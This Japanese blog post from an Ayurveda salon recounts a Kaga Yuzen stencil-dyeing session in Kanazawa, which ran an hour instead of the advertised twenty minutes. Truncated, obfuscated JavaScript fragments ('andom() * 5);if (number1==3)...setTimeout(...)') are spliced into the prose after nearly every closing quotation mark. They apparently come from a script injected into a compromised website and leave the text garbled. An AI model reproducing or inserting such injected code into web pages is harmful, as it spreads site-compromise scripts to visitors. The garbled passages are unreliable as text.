金沢に行ってきました♪ 其の二

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
さて、金沢での体験は「金澤寿し」だけではありません
二日目は「加賀友禅染め体験」andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}に挑戦です。
(無類の挑戦したがり屋:笑)
向かったのは、「加賀友禅伝統産業会館」andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
こちらでは、加賀友禅の染め体験はもとより、
着物の着装体験からの写真撮影や街歩きレンタルまであるのです。
私も時間があったら、着装体験したかったのですが、
(高価な加賀友禅を着られるなんてめったにないでしょうし)
今回は時間の都合で「型染め体験」andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}に挑戦することに。

そう、この「型染め体験」、HPによれば
「所要時間約20分」andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}となっているわけですよ、20分。
しかし、そこは何事にも常に真剣勝負のワタクシ…
予想外の展開になりました。

「型染め」の場合、すでに生地に下絵がプリントされており、
見本通りに決まった色を塗っていくだけ。簡単[emoji:e-343]

DSC02315s.jpg
ポイントは、塗り絵のようにベタで塗るのではなく、
端は濃く、中心は薄く、と言うように
グラデーションにするのが大事とのこと。

DSC02316s.jpg
こうやって、色ごとに決まった型紙を乗せ
下絵の位置と合わせながら各色を塗っていきます。

DSC02317s.jpg
型染めでは色は決まっていて、この5色限定。
筆も色ごとに決まっています。
筆の毛は意外に硬くて短く、独特の感じです。
「外側を濃く、内側を薄く・・・」andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
教えられたことを呪文のように復唱しながら真剣に塗り続ける女一人・・・
平日の昼間とあって、誰もいない作業スペースで黙々と作業を進めて
ようやく完成。
2013-04-052s.jpg
時計を見たら、通常20分程度のはずが
なんと1時間も塗ってました・・・andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
おかげで、次の予定が狂ったのは言うまでもありません。

あと、グラデを意識しすぎて塗りが薄かったのか、
家帰ってきて洗ったら、かなり薄くなってしまいました・・・

こんな簡単なことも出来ないなんて…と己の未熟さを嘆くと同時に、
伝統工芸の難しさ、技術の素晴らしさを身をもって理解しましたね。
でも、この失敗を糧に、次回はもっといい作品を作ります
(え?)
アーユルヴェーダサロンmanas 《マナス》

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です